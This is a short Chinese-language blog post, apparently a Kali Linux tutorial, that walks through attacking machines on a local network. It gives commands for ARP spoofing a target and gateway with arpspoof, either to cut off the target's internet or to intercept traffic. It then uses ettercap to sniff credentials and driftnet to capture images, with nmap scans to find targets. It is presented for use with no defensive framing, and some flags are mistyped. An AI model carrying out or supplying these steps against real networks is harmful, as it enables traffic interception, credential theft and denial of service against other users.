Kali 断网/欺骗/嗅探-你值得拥有哦

root@kali:~# echo 1 >/proc/sys/net/ipv4/ip_forward 开启流量转发
root@kali:~# cat /proc/sys/net/ipv4/ip_forward cat命令其实是简单查看文本内容
1 是1启动成功是0启动失败
root@kali:~# arpspoof -i eth0 -t 192.168.10.157 IP地址 192.168.10.1网关  //断网攻击
先输入这个给他们看下断网攻击然后ctrl+z 停止在输入以上欺骗效果更好 理论就是数据通过网关传输出去后再传输进去
如果不进行IP转发导致局域网的数据卡在你的网卡eth0(零)上面无法传输出去导致目标无法上网 要注意一点是这个方法只能在网线情况下可以嗅探和攻击 而WiFi情况是无线渗透这块的
如果不做前面工作就是局域网断网攻击

另一个终端里输入
root@kali:~#ettercap -Tq -i eth0
开始嗅探流量 参数大概是
T是文本模式 q是安静模式 -i后一个要欺骗时候使用的无线网卡

如果用户名是中文是无法显示出正确的中文名而是一段乱码 这时候需要去百度搜索一下URL 解码器就可以解码了

arpspoof欺骗 –I Arp欺骗使用的网卡 -t 目标ip和网关
网关Windows 用cmd查看 ipconfig
Linux 用ifconfig查看

etercap 很多功能 可以DNS欺骗 也可以流量嗅探

先来确认我们的攻击目标机器 ip可以用工具查看到
网关因为是一个局域网所以一样的
比如
nmap这个工具 nmap –sn加IP地址范围
nmap –o 一个IP地址可以查看你的系统
nmap -p”*”IP 对目标所有端口开始扫描
nmap -sV 对目标正在运行软件进行扫描

driftnet -i eth0

未经允许不得转载:老汪的博客 » Kali 断网/欺骗/嗅探-你值得拥有哦

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

什么?你想更了解我?

点击联系点击联系